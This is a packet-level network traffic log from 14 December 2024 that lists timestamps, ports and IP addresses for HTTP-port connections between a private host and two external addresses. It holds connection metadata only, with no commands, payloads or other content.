Dec 14, 2024 23:58:46.394112110 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.394668102 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.394717932 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.653528929 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.653601885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.654320955 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.655792952 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.655879021 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.655998945 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.656131029 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.664195061 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.664475918 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.665014982 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.665158033 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.665262938 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.665281057 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.670034885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.670177937 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.670298100 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.678574085 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.678708076 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.678821087 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.687036991 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.687143087 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.687155008 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.687195063 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.778882980 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.778950930 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.779010057 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.779119968 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.783097029 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.783147097 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.783927917 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.784032106 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.784063101 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.784214020 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.792428017 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.792494059 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.792615891 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.792656898 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.800918102 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.800990105 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.801007032 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.801048994 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.809403896 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.809467077 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.809529066 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.809613943 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.845419884 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.845556021 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.845583916 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.845623016 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.849482059 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.849544048 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.850981951 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.851037025 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.851129055 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.851174116 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.859302998 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.859370947 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.859376907 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.859491110 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.865689039 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.865741014 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.865792036 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.865838051 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.873922110 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.874072075 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.874185085 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.874185085 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.882194042 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.882262945 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.882296085 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.882428885 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.890521049 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.890573025 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.890609980 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.890609980 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.905548096 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.905667067 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.905685902 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.905710936 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.908723116 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.908936024 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.909378052 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.909451962 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.909507036 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.909614086 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.915920019 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.916030884 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.916129112 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.916129112 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.922188997 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.922223091 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.970835924 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.970884085 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.970957041 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.971194983 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.973659992 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.973728895 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.973761082 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.974029064 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.979271889 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.979341984 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.981343985 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.981448889 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.981494904 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.981494904 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.987004995 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.987050056 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.987118006 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.987183094 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.992645025 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.992746115 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.992788076 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.992788076 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.998303890 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.998399973 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.998411894 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.998483896 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.003916025 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.004021883 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.004045010 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.004101992 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.009592056 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.009634018 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.009753942 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.009869099 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.015261889 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.015332937 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.015412092 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.015515089 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.020893097 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.021008015 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.021023035 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.021215916 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.037461042 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.037527084 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.037583113 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.037664890 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.039156914 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.039232969 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.039271116 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.039324045 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.042412043 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.042522907 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.043638945 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.043715000 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.043750048 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.043809891 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.046956062 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.047029018 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.047060013 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.047152996 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.050240040 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.050307989 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.050352097 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.050426006 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.053554058 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.053633928 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.053668022 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.053826094 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.056849003 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.056902885 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.056943893 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.057054043 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.060153961 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.060204029 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.060281038 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.060349941 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.063457966 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.063604116 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.063615084 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.063781977 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.066793919 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.066834927 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.066899061 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.066999912 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.070065975 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.070199966 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.070494890 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.070494890 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.073438883 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.073487043 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.073542118 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.073579073 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.099330902 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.099498987 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.099518061 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.099553108 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.100908041 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.101160049 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.101540089 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.101675034 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.101737976 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.101902008 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.104831934 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.104957104 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.104964972 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.105091095 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.108120918 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.108584881 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.162811041 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.162864923 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.162906885 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.162906885 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.163728952 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.163886070 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.163891077 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.163939953 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.166835070 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.166930914 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.167007923 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.167052031 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.169281960 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.169415951 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.169564962 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.169564962 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.172365904 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.172485113 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.172774076 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.172774076 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.175481081 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.175595999 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.175625086 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.175745964 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.178421974 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.178549051 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.178582907 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.178621054 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.181233883 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.181349993 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.181350946 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.181394100 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.183938980 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.184086084 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.184129000 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.184190989 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.186537981 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.186664104 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.186721087 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.186790943 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.189127922 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.189218044 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.189234018 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.189295053 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.191575050 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.191636086 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.191703081 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.191765070 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.194032907 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.194086075 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.194152117 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.194454908 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.196461916 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.196553946 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.196599007 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.197051048 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.198821068 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.198956966 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.198997021 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.199170113 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.201108932 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.201241016 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.201247931 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.201322079 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.203428030 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.203587055 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.203634977 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.203634977 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.205768108 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.205848932 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.205862999 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.206007957 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.208030939 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.208089113 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.208153963 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.208353043 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.229690075 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.229743958 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.229804039 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.229825020 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.232501984 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.232633114 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.232670069 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.232703924 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.232712030 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.232764959 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.233081102 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.233249903 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.234270096 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.234318972 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.234383106 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.234431028 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.236069918 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.236171961 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.236176014 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.236210108 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.237406969 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.237549067 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.237555027 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.237601995 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.239557028 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.239609957 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.239896059 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.239896059 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.241070986 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.241252899 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.241261959 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.241297960 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.242883921 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.242964983 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.243022919 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.243272066 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.244746923 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.244860888 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.244879007 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.244946003 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.246576071 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.246695042 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.246711969 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.246822119 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.248372078 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.248456955 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.248508930 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.248600006 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.250205040 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.250294924 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.250324965 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.250664949 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.252043962 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.252099991 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.252161980 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.252207041 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.253921986 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.254024029 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.254035950 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.254215956 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.255696058 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.255780935 CET	49855	80	192.168.2.4	185.215.113.206
